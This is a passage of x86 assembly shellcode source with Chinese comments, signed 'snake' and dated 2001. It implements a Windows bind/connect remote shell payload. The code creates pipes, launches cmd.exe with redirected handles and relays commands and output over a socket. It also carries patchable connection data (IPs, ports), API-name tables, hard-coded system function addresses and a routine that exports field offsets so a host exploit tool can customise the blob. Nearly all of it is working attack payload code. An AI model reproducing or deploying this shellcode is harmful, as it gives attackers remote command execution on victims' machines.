push edi;

lea edi, [edi+STARTUPINFO.hStdOutput];

lea esi, [edx+Shell_Cmd_Pipe.ShellStdoutPipe];

mov eax, [esi];

mov [edi], eax;

pop edi;

;// DuplicateHandle( GetCurrentProcess(), ShellStdoutPipe, GetCurrentProcess(),

;// &(si.hStdError),DUPLICATE_SAME_ACCESS, TRUE, 0);

mov esi, FUNC_PARAM_1;

mov eax, [esi+SkOverflowFuncAddr.GetCurrentProcess];

call eax;

xor ecx, ecx;

push ecx; //0

inc ecx;

push ecx; //TRUE

inc ecx;

push ecx; //DUPLICATE_SAME_ACCESS

lea edx, [edi+STARTUPINFO.hStdError];

push edx; //&(si.hStdError)

push eax; //GetCurrentProcess();

push esi;

mov esi, FUNC_PARAM_2;

lea esi, [esi+Shell_Cmd_Pipe.ShellStdoutPipe];

mov ebx, [esi];

pop esi;

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_2;

run_actual4_1:

jmp run_actual4;

_temp_2:

push ebx; //ShellStdoutPipe

push eax; //GetCurrentProcess();

mov eax, [esi+SkOverflowFuncAddr.DuplicateHandle];

call eax;

;// CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0,

;// NULL, NULL, &si, &ProcessInformation )

xor eax, eax;

mov edi, FUNC_PARAM_2;

lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];

push edx; ;//&ProcessInformation

lea edx, [edi+Shell_Cmd_Pipe.nstartupinfo];

push edx; ;//&si

push eax; ;//NULL;

push eax; ;//NULL;

push eax; ;//0;

inc eax;

push eax; ;//TRUE;

dec eax;

push eax; ;//NULL;

push eax; ;//NULL;

mov edx, FUNC_PARAM_3;

push edx; ;//LPCTSTR lpszCommand.

push eax; ;//NULL;

mov eax, [esi+SkOverflowFuncAddr.CreateProcessA];

call eax;

;//CloseHandle( ShellStdinPipe);

mov eax, [edi+Shell_Cmd_Pipe.ShellStdinPipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

;//CloseHandle( ShellStdoutPipe);

mov eax, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

pop eax;

pop ebx;

pop ecx;

pop edx;

pop esi;

pop edi;

mov esp, ebp;

pop ebp;

ret;

;//memset( &si, 0, sizeof(STARTUPINFO));

run_actual4:

jmp run_actual5;

;//关闭不再用的管套

;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

_Close_All_Communication_Pipe:

push ebp;

mov ebp, esp;

push esi;

push edi;

push edx;

push ecx;

push ebx;

push eax;

mov esi, FUNC_PARAM_1;

mov edi, FUNC_PARAM_2;

;//closesocket(msocket);

mov eax, [edi+Shell_Cmd_Pipe.msocket];

push eax;

mov eax, [esi+SkOverflowFuncAddr.closesocket];

call eax;

;//closehandle(handle)..

mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

;//closehandle(handle)..

mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.CloseHandle];

call eax;

pop eax;

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual5:

jmp run_actual6_1;

;//接受管套的数据,写进pipe,读pipe,发送到socket.

;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

_Recv_Write_Socket_Pipe:

push ebp;

mov ebp, esp;

xor eax, eax;

mov ax, 2f0h;

sub esp, eax; // 496bytes, use for char szTemp[240];

push esi;

push edi;

push edx;

push ecx;

push ebx;

mov esi, FUNC_PARAM_1; //SkOverflowFuncAddr *pAddr;

mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;

;//dwBreak = 1

lea edx, [ebp - size Recv_Write_Socket_Pipe_Data + Recv_Write_Socket_Pipe_Data.dwBreak];

xor eax, eax;

inc eax;

mov [edx], eax;

;//while(!bBreak)

_While_Read_Data_Loop:

;//监测 dwBreak == 0?

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwBreak];

mov eax, [edx];

test eax, eax;

jz _Quit_While_Read_Data_Loop_1;

;//iLen = recv( newsocket, szTemp, sizeof(szTemp)-1, 0);

xor eax, eax;

push eax;

mov al, SIZE_OF_TEMP_BUFFER;

push eax;

lea eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push eax;

lea ebx, [edi+Shell_Cmd_Pipe.msocket];

mov eax, [ebx];

push eax;

mov eax, [esi+SkOverflowFuncAddr.recv];

call eax;

cmp eax, -1;

jne _NextStep_Receive_Test;

push eax;

pop edx;

mov eax, [esi+SkOverflowFuncAddr.GetLastError];

call eax;

cmp ax, 10060; //timeout?

je _Read_StdoutPipe;

_Quit_While_Read_Data_Loop_1:

jmp _Quit_While_Read_Data_Loop; //error.

_NextStep_Receive_Test:

test eax, eax; //eax == 0?

je _Quit_While_Read_Data_Loop; //break;

jng _Read_StdoutPipe;

;//Receive_Ok_Occure:

;//if( iLen > 0)

;//WriteFile( hWritePipe, szTemp, iLen, &dwTemp, NULL)

xor edx, edx;

push edx; //NULL

lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push ebx; //&dwTemp

push eax; //iLen

lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push ebx; //szTemp;

mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];

push eax;

mov eax, [esi+SkOverflowFuncAddr.WriteFile];

call eax;

test eax, eax;

jz _Quit_While_Read_Data_Loop; //WriteFile(..) == 0, 失败,管套中断.

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_3;

run_actual6_1:

jmp run_actual6;

_temp_3:

_Read_StdoutPipe:

;//PeekNamedPipe(hReadPipe,NULL,0,NULL,&dwTemp,NULL );

xor eax, eax;

push eax; //NULL

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push edx; //&dwTemp

push eax; //NULL

push eax; //0

push eax; //NULL

mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];

push eax; //hReadPipe

mov eax, [esi+SkOverflowFuncAddr.PeekNamedPipe];

call eax;

mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

test eax, eax;

jz _No_Data_To_Read_Yet;

;//ReadFile( hReadPipe, szTemp, sizeof(szTemp), &dwTemp, NULL)

xor eax, eax;

push eax; //NULL

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push edx; //&dwTemp

mov al, SIZE_OF_TEMP_BUFFER;

push eax; //sizeof(szTemp);

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push edx; //szTemp;

mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];

push eax; //hReadPipe

mov eax, [esi+SkOverflowFuncAddr.ReadFile];

call eax; //ReadFile.

;//if( ReadFile (...) == 0)? then quit.

test eax, eax;

je _Quit_While_Read_Data_Loop;

;//send( newsocket, szTemp, dwTemp, 0);

xor eax, eax;

push eax; //0

mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];

push eax; //dwTemp;

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];

push edx; //szTemp;

mov eax, [edi+Shell_Cmd_Pipe.msocket];

push eax; //socket.

mov eax, [esi+SkOverflowFuncAddr.send];

call eax;

cmp eax, -1;

je _Quit_While_Read_Data_Loop;

jmp _Read_StdoutPipe; //continue to read next data.

_No_Data_To_Read_Yet:

jmp _While_Read_Data_Loop;

_Quit_While_Read_Data_Loop:

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual6:

jmp run_actual;

;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

_Create_Two_Pipe:

push ebp;

mov ebp, esp;

xor eax, eax;

mov al, 0f0h;

sub esp, eax; //开辟空间

push esi;

push edi;

push edx;

push ecx;

push ebx;

mov esi, FUNC_PARAM_1;

mov edi, FUNC_PARAM_2;

xor ebx,ebx;

lea edi, [ebp-10h];

;//SecurityAttributes.lpSecurityDescriptor = NULL; //default ACL

lea edx, [edi+SECURITY_ATTRIBUTES.lpSecurityDescriptor];

mov [edx], ebx;

;//SecurityAttributes.bInheritHandle = TRUE; //will inherit handle

lea edx, [edi+SECURITY_ATTRIBUTES.bInheritHandle];

inc ebx;

mov [edx], ebx;

;//SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);

lea edx, [edi+SECURITY_ATTRIBUTES.nLength];

mov bl, size SECURITY_ATTRIBUTES;

mov [edx], ebx;

xor ebx, ebx;

;//bResult = CreatePipe( &hReadPipe, &ShellStdoutPipe, &SecurityAttributes, 0);output into _FUNC_PARAM_2's variables.

push edi; //save.

push ebx; //0

push edi; //&SecurityAttributes

mov edi, FUNC_PARAM_2;

lea edx, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];

mov [edx], ebx; //ShellStdoutPipe = 0;

push edx; //&ShellStdoutPipe

lea edx, [edi+Shell_Cmd_Pipe.hReadPipe];

push edx;; //&hReadPipe

mov eax, [esi+SkOverflowFuncAddr.CreatePipe];

call eax;

pop edi; //restore.

test eax, eax;

je _Create_Pipe_Quit_Error;

;//Create Second Pipe.

;//CreatePipe( &ShellStdinPipe, &hWritePipe, &SecurityAttributes, 0);

xor ebx, ebx;

push ebx; //0

push edi; //&SecurityAttributes

mov edi, FUNC_PARAM_2;

lea edx, [edi+Shell_Cmd_Pipe.hWritePipe];

push edx; //&hWritePipe

lea edx, [edi+Shell_Cmd_Pipe.ShellStdinPipe];

mov [edx],ebx;

push edx; //&ShellStdinPipe

mov eax, [esi+SkOverflowFuncAddr.CreatePipe];

call eax;

test eax, eax;

je _Create_Pipe_Quit_Error;

xor eax, eax;

inc eax;

jmp _Create_Pipe_Quit;

_Create_Pipe_Quit_Error:

xor eax, eax;

jmp _Create_Pipe_Quit;

nop;

_Create_Pipe_Quit:

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual:

lea esi, [esp];

mov esi, [esi]; //ebx 是调用代码的地址

xor ecx, ecx;

mov cx,MyDataOffset;

add esi, ecx; //esx 是未来 数据的地址.

;//ebp-0x2ff 处,是 szShellNeedFunc结构.

lea edi, [ebp - szShellNeedFunc_OFFSET];

push edi;

;//MyDebugAdd -----

mov cx, _size_AllData;

rep movsb;

;//还要包括 连接信息结构 的数据

pop edi;

push edi;

;//将'+'转换成 "\x00"

;//void _Convert_Add_Sign_To_Null_Sign(void *ptr, int iLen, DWORD dwOld, DWORD dwNew);

xor ecx, ecx;

push ecx; //---参数4

mov cl, '+';

push ecx; //---参数3

mov cx, _size_szShellNeedFunc;

push ecx; //---参数2

xor ebx, ebx;

mov bl, String_Of_Data_Offset;

add edi, ebx; //edi指向 真正的 szShellNeedFunc

push edi; //---参数1

call _Convert_Add_Sign_To_Null_Sign;

add esp, 10h;

;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址

;//void _Get_Overflow_Addr_From_Shell_Func( SkOverflowFuncAddr *pSkOverflowFuncAddr, char *ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr)

xor ecx, ecx;

mov cx, _GetModuleHandle_Addr_Offset;

mov esi, edi;

add esi, ecx;

mov eax, [esi+4]

push eax; ;//GetProcAddress_Addr

mov eax, [esi];

push eax; ;//GetModuleHandle_Addr

push edi;

;//ebp-0x1ff处,是 SkOverflowFuncAddr结构.

lea esi, [ebp-SkOverflowFuncAddr_OFFSET];

push esi;

call _Get_Overflow_Addr_From_Shell_Func;

add esp, 10h;

pop edi;

;//创建 一个管套,监听一个端口/连接到一个ip:port,返回该管套.

;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);

push edi;

push esi;

call _Create_Bind_Connect_Socket_To_Port;

add esp, 8;

test eax, eax;

jz Main_Quit_Now; //socket 失败.

lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];

lea ebx, [edi + Shell_Cmd_Pipe.msocket];

mov [ebx], eax; //保存结果到 msocket中.

;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

;//创建2个pipe,用来绑定shell.

push edi;

push esi;

call _Create_Two_Pipe;

add esp, 8;

test eax, eax;

jz Main_Quit_Now;

;//now is ok.

;//在管套 pipe 上,运行进程 pStrCmd;

;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);

lea edi, [ebp-szShellNeedFunc_OFFSET];

xor eax,eax;

mov al, String_Of_Data_Offset; //cmd.exe命令行在数据中的偏移.

add edi, eax;

push edi; //"cmd.exe"的指针

lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];

push edi;

push esi;

call _Create_Process_To_Handle;

add esp, 0ch;

;//接受管套的数据,写进pipe,读pipe,发送到socket.

;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

push edi;

push esi;

call _Recv_Write_Socket_Pipe;

add esp, 8;

;//关闭不再用的管套

;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);

push edi;

push esi;

call _Close_All_Communication_Pipe

add esp, 8;

;//关闭该进程

xor eax, eax;

push eax;

lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];

mov eax, [edx+PROCESS_INFORMATION.hProcess];

push eax;

mov eax, [esi+SkOverflowFuncAddr.TerminateProcess];

call eax;

Main_Quit_Now: ;//现在推出..

;//exit now.

xor eax, eax;

push eax;

mov eax, [esi+ SkOverflowFuncAddr.ExitProcess];

call eax;

ret;

;//quit_return:

;//恢复堆栈

mov esp,ebp;

pop ebp;

nop;

nop;

;//下面是数据:

MyDataOffset equ $-call_back_Data_Offset; //call 函数,到这里的距离.

ConnectTypeOffset equ $-start;

ListenPortOffset equ ConnectTypeOffset+stConnectInfo.dwListenPort;

ConnectIP1Offset equ ConnectTypeOffset+stConnectInfo.dwIP1;

ConnectIP2Offset equ ConnectTypeOffset+stConnectInfo.dwIP2;

ConnectPortOffset equ ConnectTypeOffset+stConnectInfo.dwConnectPort;

MyConnectInfo stConnectInfo < 2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h>

String_Of_Data_Offset equ $-MyConnectInfo;

ExecCommandOffset equ $-start;

szShellNeedFunc db 'cmd.exe+++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

;//下面是函数信息.

SHELL_NEED_FUNC_BODY_OFFSET equ $-szShellNeedFunc;//这个是shell函数和dll的偏移

db 02h

db 0eh, 'kernel32.dll+', '+'

db 0eh

db 11h, 'TerminateProcess', '+'

db 0bh, 'CreatePipe', '+'

db 10h, 'GetStartupInfoA', '+'

db 0fh, 'CreateProcessA', '+'

db 0eh, 'PeekNamedPipe', '+'

db 0ch, 'GlobalAlloc', '+'

db 0bh, 'WriteFile', '++'

db 09h, 'ReadFile', '+'

db 06h, 'Sleep', '+'

db 0ch, 'ExitProcess', '+'

db 0eh, 'GetLastError+', '+'

db 10h, 'DuplicateHandle', '+'

db 12h, 'GetCurrentProcess', '+'

db 0ch, 'CloseHandle','+'

db 0bh, 'ws2_32.dll', '+'

db 0bh

db 07h, 'socket', '+'

db 05h, 'bind', '+'

db 07h, 'listen', '+'

db 07h, 'accept', '+'

db 05h, 'send', '+'

db 05h, 'recv', '+'

db 0bh, 'setsockopt', '+'

db 0bh, 'WSAStartup', '+'

db 0ch, 'closesocket', '+'

db 08h, 'connect', '+'

db 0ch, 'gethostname', '+'

db '+++++++++++++++++++++'

_GetModuleHandle_Addr_Offset equ $-szShellNeedFunc

GetModuleHandleOffset equ $-start;

GetModuleHandleA_Addr dd 77e756dbh

GetProcAddressOffset equ $-start;

GetProcAddressA_Addr dd 77e7564bh

_size_szShellNeedFunc equ $-szShellNeedFunc+1

_size_AllData equ $-MyConnectInfo+1

_sk_Bind_ConnectShellCode endp

;// Separator bytes emitted immediately after the shellcode proc. No label
;// refers to them here, so they are presumably only a visual end marker for
;// the host tool that extracts the blob — confirm they are never copied as
;// part of the payload (the size equates above stop at _size_AllData).
db '---------------------------------------------------------'

;//重要数据在代码中的偏移

;// Table of byte offsets, measured from the label `start`, of the fields in
;// the assembled shellcode that the host program needs to locate (connection
;// parameters, the command string and its length, and the two hard-coded API
;// addresses). It is filled in by _GetDataSetOffset_Value below; each field
;// corresponds to one of the *Offset equates defined inside the proc above.
stDataSetOffset struct
dwConnectType DD 0;// ConnectTypeOffset: start of MyConnectInfo (stConnectInfo)
dwListenPort DD 0;// ListenPortOffset: MyConnectInfo.dwListenPort
dwConnectIP1 DD 0;// ConnectIP1Offset: MyConnectInfo.dwIP1
dwConnectIP2 DD 0;// ConnectIP2Offset: MyConnectInfo.dwIP2
dwConnectPort DD 0;// ConnectPortOffset: MyConnectInfo.dwConnectPort
dwExecCommand DD 0;// ExecCommandOffset: szShellNeedFunc, the '+'-padded command string
wSizeExecCommand DW 0;// SHELL_NEED_FUNC_BODY_OFFSET: bytes of command string before the DLL/function-name table
wReserv1 DW 0 ;// padding so that dwGetModuleHandle stays dword-aligned
dwGetModuleHandle DD 0;// GetModuleHandleOffset: the GetModuleHandleA_Addr dword
dwGetProcAddress DD 0;// GetProcAddressOffset: the GetProcAddressA_Addr dword
stDataSetOffset ends

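;// _GetDataSetOffset_Value( stDataSetOffset *pOut )
;// Writes into *pOut the byte offsets (relative to the label `start`) of the
;// patchable fields of _sk_Bind_ConnectShellCode, so the host program can find
;// them inside the assembled blob. The single pointer argument is left on the
;// stack for the caller to remove (plain `ret`, matching the `add esp, N`
;// convention used by the other calls in this file); every general register is
;// saved and restored, and nothing is returned.
;// FUNC_PARAM_1 is defined earlier in the file; it is used here as the first
;// stack argument (presumably [ebp+8]) — confirm against its definition.
_GetDataSetOffset_Value proc
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov esi, FUNC_PARAM_1; ;// esi = pOut
lea edi, [esi+stDataSetOffset.dwConnectType];
mov eax, ConnectTypeOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwListenPort];
mov eax, ListenPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP1];
mov eax, ConnectIP1Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP2];
mov eax, ConnectIP2Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectPort];
mov eax, ConnectPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwExecCommand];
mov eax, ExecCommandOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.wSizeExecCommand];
mov ax, SHELL_NEED_FUNC_BODY_OFFSET;
;// Word store: wSizeExecCommand is declared DW. The previous code stored the
;// full eax here, which also overwrote wReserv1 with the high word left over
;// from ExecCommandOffset.
mov [edi], ax;
lea edi, [esi+stDataSetOffset.dwGetModuleHandle];
mov eax, GetModuleHandleOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwGetProcAddress];
mov eax, GetProcAddressOffset;
mov [edi], eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
_GetDataSetOffset_Value endp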

end ;// end of assembly; no start address is given

----完----

读者如果看不明白程序的流程，或者程序中的相关细节，请自己多多摸索。

by snake. 2001/7/31
